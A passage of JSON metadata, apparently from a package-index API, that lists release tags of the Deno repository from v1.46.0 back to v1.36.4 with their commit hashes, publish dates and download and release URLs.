/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden